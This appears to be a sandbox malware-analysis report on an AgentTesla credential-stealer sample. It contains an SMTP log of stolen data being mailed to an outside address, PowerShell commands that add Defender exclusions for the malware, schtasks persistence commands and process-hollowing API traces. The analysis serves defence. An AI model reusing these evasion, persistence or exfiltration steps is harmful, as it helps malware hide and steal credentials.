Mar 18, 2024 14:32:19.942204952 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | .
Mar 18, 2024 14:32:20.705231905 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 220 frontend.nayatel.com Axigen ESMTP ready
Mar 18, 2024 14:32:20.705467939 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | EHLO 210979
Mar 18, 2024 14:32:21.003885984 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 250-frontend.nayatel.com Axigen ESMTP hello
    250-PIPELINING
    250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
    250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
    250-8BITMIME
    250-BINARYMIME
    250-CHUNKING
    250-SIZE 2097152000
    250-STARTTLS
    250-HELP
    250 OK
Mar 18, 2024 14:32:21.011807919 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
Mar 18, 2024 14:32:21.311292887 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 535 Authentication failed
Mar 18, 2024 14:32:21.311584949 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | AUTH login bmFzZWVyQGN1cC5vcmcucGs=
Mar 18, 2024 14:32:21.609652996 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Mar 18, 2024 14:32:21.908092976 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 235 Authentication successful
Mar 18, 2024 14:32:21.908449888 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | MAIL FROM:<naseer@cup.org.pk>
Mar 18, 2024 14:32:22.207530975 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 250 Sender accepted
Mar 18, 2024 14:32:22.207885027 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | RCPT TO:<admin@glamourstorepa.com.br>
Mar 18, 2024 14:32:22.506844044 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 250 Recipient accepted
Mar 18, 2024 14:32:22.507055044 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | DATA
Mar 18, 2024 14:32:22.805356026 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 354 Ready to receive data; remember <CRLF>.<CRLF>
Mar 18, 2024 14:32:22.806255102 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | .
Mar 18, 2024 14:32:30.138117075 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 250 Mail queued for delivery
Mar 18, 2024 14:32:32.154854059 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 250 Mail queued for delivery
Mar 18, 2024 14:33:56.911725044 CET | 49708 | 587 | 192.168.2.5 | 203.82.48.116 | QUIT
Mar 18, 2024 14:33:57.209305048 CET | 587 | 49708 | 203.82.48.116 | 192.168.2.5 | 221-frontend.nayatel.com Axigen ESMTP is closing connection
    221 Good bye
Mar 18, 2024 14:34:00.117048979 CET | 49711 | 587 | 192.168.2.5 | 203.82.48.116 | QUIT
Mar 18, 2024 14:34:00.415091991 CET | 587 | 49711 | 203.82.48.116 | 192.168.2.5 | 221-frontend.nayatel.com Axigen ESMTP is closing connection
    221 Good bye


                                Target ID:0
                                Start time:14:32:11
                                Start date:18/03/2024
                                Path:C:\Users\user\Desktop\P020241901.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\P020241901.exe
                                Imagebase:0x30000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe"
                                Imagebase:0xf60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe"
                                Imagebase:0xf60000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp"
                                Imagebase:0xb30000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:14:32:12
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:14:32:13
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:14:32:13
                                Start date:18/03/2024
                                Path:C:\Users\user\Desktop\P020241901.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\P020241901.exe
                                Imagebase:0x530000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3234380229.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:10
                                Start time:14:32:14
                                Start date:18/03/2024
                                Path:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Imagebase:0x290000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 66%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:11
                                Start time:14:32:15
                                Start date:18/03/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp"
                                Imagebase:0xb30000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:14:32:17
                                Start date:18/03/2024
                                Path:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                                Imagebase:0x7b0000
                                File size:631'296 bytes
                                MD5 hash:F061401DD36DC8E88017EF9F9A43E5A7
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3233407833.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false


                                  Execution Graph

                                  Execution Coverage:11.8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:260
                                  Total number of Limit Nodes:11
execution_graph: node and edge list backing the interactive execution graph widget (not readable as text; omitted here). Windows API calls named on the graph nodes: CallWindowProcW, PostMessageW, Wow64SetThreadContext, WriteProcessMemory, VirtualAllocEx, ResumeThread, ReadProcessMemory.
34550->34551 34553 6ed4bc7 34551->34553 34553->34473 34555 6ed4840 ResumeThread 34554->34555 34557 6ed4871 34555->34557 34557->34491 34559 6ed4840 ResumeThread 34558->34559 34561 6ed4871 34559->34561 34561->34491 34563 6ed4d59 CreateProcessA 34562->34563 34565 6ed4f1b 34563->34565 34567 6ed4d59 CreateProcessA 34566->34567 34569 6ed4f1b 34567->34569 34570 97d0f8 34571 97d13e 34570->34571 34575 97d2c9 34571->34575 34578 97d2d8 34571->34578 34572 97d22b 34576 97d306 34575->34576 34581 97c9e0 34575->34581 34576->34572 34579 97c9e0 DuplicateHandle 34578->34579 34580 97d306 34579->34580 34580->34572 34582 97d340 DuplicateHandle 34581->34582 34583 97d3d6 34582->34583 34583->34576 34584 97ad78 34588 97ae70 34584->34588 34596 97ae60 34584->34596 34585 97ad87 34589 97ae81 34588->34589 34590 97aea4 34588->34590 34589->34590 34604 97b0f8 34589->34604 34608 97b108 34589->34608 34590->34585 34591 97ae9c 34591->34590 34592 97b0a8 GetModuleHandleW 34591->34592 34593 97b0d5 34592->34593 34593->34585 34597 97ae81 34596->34597 34599 97aea4 34596->34599 34597->34599 34602 97b0f8 LoadLibraryExW 34597->34602 34603 97b108 LoadLibraryExW 34597->34603 34598 97ae9c 34598->34599 34600 97b0a8 GetModuleHandleW 34598->34600 34599->34585 34601 97b0d5 34600->34601 34601->34585 34602->34598 34603->34598 34605 97b11c 34604->34605 34606 97b141 34605->34606 34612 97a8b0 34605->34612 34606->34591 34609 97b11c 34608->34609 34610 97b141 34609->34610 34611 97a8b0 LoadLibraryExW 34609->34611 34610->34591 34611->34610 34613 97b2e8 LoadLibraryExW 34612->34613 34615 97b361 34613->34615 34615->34606 34675 974668 34676 97467a 34675->34676 34677 974686 34676->34677 34679 974778 34676->34679 34680 97479d 34679->34680 34684 974888 34680->34684 34688 974878 34680->34688 34686 9748af 34684->34686 34685 97498c 34685->34685 34686->34685 34692 974248 34686->34692 34690 9748af 34688->34690 34689 97498c 34689->34689 34690->34689 34691 974248 CreateActCtxA 34690->34691 34691->34689 34693 975918 CreateActCtxA 34692->34693 
34695 9759db 34693->34695
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 331669c5db75351fd39c6efd97fbf2abdf67e9a8f8e8705dfacd81176d7b483e
                                  • Instruction ID: aa2d0e86294172da6f11b0ab2cb828e0ea9c1dcb8b84df16e96a81891b001c11
                                  • Opcode Fuzzy Hash: 331669c5db75351fd39c6efd97fbf2abdf67e9a8f8e8705dfacd81176d7b483e
                                  • Instruction Fuzzy Hash: B272F574A11219CFDB24DF68C990B9EB7B2BF89301F1085E9D409AB365DB30AE85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86dbb427bfb1a29e8489dee9bb0403ba4fecf1d19915b4ada1bb2a8ae9c6a383
                                  • Instruction ID: 60f44f82821bf3e1ec62c75c71d4117d340e77cbfac66ea688f3871c4321735f
                                  • Opcode Fuzzy Hash: 86dbb427bfb1a29e8489dee9bb0403ba4fecf1d19915b4ada1bb2a8ae9c6a383
                                  • Instruction Fuzzy Hash: 6B62D434A11219CFDB24DF64C990B9EB7B2BF89305F1085EAD509AB364DB34AE85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 6ed4cc4; calls CreateProcessA)
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06ED4F06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: ae1dc705f01577a95f04567bcc0cc834795cee5f9c505f957d1174349391db17
                                  • Instruction ID: 87ad74966c45e67cf36e573fa5c72c725eacc9f6b676a759153a1143f7a18ff4
                                  • Opcode Fuzzy Hash: ae1dc705f01577a95f04567bcc0cc834795cee5f9c505f957d1174349391db17
                                  • Instruction Fuzzy Hash: AF916B71D00319DFDB64DF68C840BEEBAF2BF48314F1485A9E808A7294DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 6ed4cd0; calls CreateProcessA)
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06ED4F06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 431b707a8b11ca8d94be6636fc4c13f10c7971a11458284451ac555f6bb51e73
                                  • Instruction ID: 03bd19e8b50a9f4e1dd0fc793ec98b2793a7658d30e80d2df671e7a3dee1149f
                                  • Opcode Fuzzy Hash: 431b707a8b11ca8d94be6636fc4c13f10c7971a11458284451ac555f6bb51e73
                                  • Instruction Fuzzy Hash: 30917A71D00319CFDB64DF68C840BAEBBF2BF48304F1485A9E808A7294DB749986CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 97ae70; calls GetModuleHandleW and the routines at 979878, 97b0f8, 97b108, 97a854, 97a864, 97a874, 97a884)
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0097B0C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 8ae84b510d7024248ef9e9df9e2eb7cf506b15be35172b9752a0ab9ffb0f0e22
                                  • Instruction ID: 9f56c5b49ac51bee73c92aae103f5bdc788b2c94451feced9a938b211aa64a09
                                  • Opcode Fuzzy Hash: 8ae84b510d7024248ef9e9df9e2eb7cf506b15be35172b9752a0ab9ffb0f0e22
                                  • Instruction Fuzzy Hash: 6A7157B1A00B058FD724DF2AD44079ABBF5FF88304F10892DE48AD7A50DB75E945CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 4a90bfc; calls CallWindowProcW and the routine at 4a90ad4)
                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A94381
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: 04bff17d2c4c101c58b750ce16871be6637f76baa520fbdd7f2647f82edbc058
                                  • Instruction ID: 925395458613bc0dead7e80610edd88ce61c974c84c0c26e91259f6f52330d7f
                                  • Opcode Fuzzy Hash: 04bff17d2c4c101c58b750ce16871be6637f76baa520fbdd7f2647f82edbc058
                                  • Instruction Fuzzy Hash: 874156B4A04309DFDB04DF99C488AABBBF5FF88314F24C459D519AB321D374A841CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 974248; calls CreateActCtxA)
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: bd44db253426763263a9f3651753713b208fafbc7b63476b9f76a4e55d838b5e
                                  • Instruction ID: e07edd9e0138ac9586d620dbd6d702f327aac4cdd1605afc5fe8eb0e9fa08a38
                                  • Opcode Fuzzy Hash: bd44db253426763263a9f3651753713b208fafbc7b63476b9f76a4e55d838b5e
                                  • Instruction Fuzzy Hash: EE41D1B1C0071DCBDB24DFA9C884B9EBBB5FF49304F20816AD408AB255DBB56945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 97590c; calls CreateActCtxA)
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009759C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 43c68a796276f4425cd8754d07697e3df93ddf083c70447fbf8a391fc53bf82d
                                  • Instruction ID: 802b0112ad9fa29d67d03b87b68c3012fb8c02b6c826ffb1939f7312ad5f848f
                                  • Opcode Fuzzy Hash: 43c68a796276f4425cd8754d07697e3df93ddf083c70447fbf8a391fc53bf82d
                                  • Instruction Fuzzy Hash: 5F410FB1C00619CBDB24DFA9C98479DBBB5FF48304F20806AC418AB265DBB56946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 6ed4a40; calls WriteProcessMemory)
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06ED4AD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: aa4c23bb0c653140aaa39b0514e357c8593e1ac56c1d07260fde487a63f6fabf
                                  • Instruction ID: fef7815d4713d0663d6cb68d9e8e14eac75c2147d802e50c47b1f79fa2f5b418
                                  • Opcode Fuzzy Hash: aa4c23bb0c653140aaa39b0514e357c8593e1ac56c1d07260fde487a63f6fabf
                                  • Instruction Fuzzy Hash: 582146B1900309DFCB10DFAAC885BEEBBF1FF48310F10842AE959A7240D7789945CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 6ed4a48; calls WriteProcessMemory)
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06ED4AD8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 5626f45e0f0cfb14c020f0cae52acf0f31d9e72ebbefa4e543b033faec5882eb
                                  • Instruction ID: 5778956d9eba0df0717e86b3039b3e55338513c3dc94004e7b8c0f030c21bb49
                                  • Opcode Fuzzy Hash: 5626f45e0f0cfb14c020f0cae52acf0f31d9e72ebbefa4e543b033faec5882eb
                                  • Instruction Fuzzy Hash: 0C212A71900349DFCB10DFAAC945BEEBBF5FF48310F108429E919A7240D7789944CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function entry 6ed48a8; calls Wow64SetThreadContext)
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED492E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 37e65a2272d39c677e7c9eed1c549393209f4bbd0e909ec992955dd2af282d84
                                  • Instruction ID: 781b11b3a58043bbe4650f6de5f8b46a0885a26681bc649c39b4832a91bf622f
                                  • Opcode Fuzzy Hash: 37e65a2272d39c677e7c9eed1c549393209f4bbd0e909ec992955dd2af282d84
                                  • Instruction Fuzzy Hash: CC2159B1D003098FDB50DFAAC5857EEBBF4EF58314F50842AD459A7280C7789545CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D3C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 87b69b89ce4a5c0acbb38a78cf3e6ef4d7d5c1bb1ff2d7f30f8b90dd74df9cc6
                                  • Instruction ID: 337309f730fbf20bac916dd9d406d7fe479733fd81b113887849546eaea0ea23
                                  • Opcode Fuzzy Hash: 87b69b89ce4a5c0acbb38a78cf3e6ef4d7d5c1bb1ff2d7f30f8b90dd74df9cc6
                                  • Instruction Fuzzy Hash: B52103B5900208AFDB10CF9AD484AEEBBF8FF48314F14841AE918A3350D378A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06ED4BB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 43b5fe30437b576f4e4e916e7363006b809581741bfd75da2ee581ff631bc3f9
                                  • Instruction ID: bc7e2aab0bcb85d83fcfed1b901cd469c569957c614598f7b9682850b6883011
                                  • Opcode Fuzzy Hash: 43b5fe30437b576f4e4e916e7363006b809581741bfd75da2ee581ff631bc3f9
                                  • Instruction Fuzzy Hash: A42125B1C003499FCB10DFAAC881AEEBBF5FF48310F50842AE519A7250C779A940CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06ED4BB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: d303219c5e4b6ab157837a4ef50cb9f0de27930d8492d8a4ff924e57c60370ff
                                  • Instruction ID: b428000b9e1433282ee3617f9e0ee6c6338d9cd5f508769c0e0a48e32810c183
                                  • Opcode Fuzzy Hash: d303219c5e4b6ab157837a4ef50cb9f0de27930d8492d8a4ff924e57c60370ff
                                  • Instruction Fuzzy Hash: F62134B1C00349DFCB10DFAAC880AEEBBF5FF48310F10842AE519A7290C7399941CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED492E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
